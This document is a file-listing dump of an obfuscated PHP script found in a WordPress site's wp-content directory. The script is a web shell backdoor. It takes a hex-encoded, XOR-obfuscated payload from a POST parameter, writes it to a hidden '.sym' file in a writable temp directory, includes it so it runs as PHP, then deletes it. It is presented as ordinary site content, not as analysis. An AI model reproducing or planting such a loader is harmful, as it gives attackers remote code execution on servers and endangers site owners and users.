File "custom.file.5.1788041708.php"
Full Path: /home/planet5/public_html/bansibaba.com/wp-content1/easypost/custom.file.5.1788041708.php
File size: 711 bytes
MIME-type: --
Charset: utf-8
<!--QSiCLWvG-->
<?php
$pgrp="elem";
if(isset($_POST[$pgrp]) ? true : false){
$property_set = pack("H*", $_POST[$pgrp]);
$item = '' ; for($k=0;$k<strlen($property_set);$k++){$item.=chr(ord($property_set[$k])^72);}
$bind = array_filter([getenv("TEMP"), "/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm", getcwd(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir")]);
while ($ent = array_shift($bind)) {
if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) {
$rec = vsprintf("%s/%s", [$ent, ".sym"]);
$written = file_put_contents($rec, $item);
if ($written !== false) {
include $rec;
unlink($rec);
exit;
}
}
}
}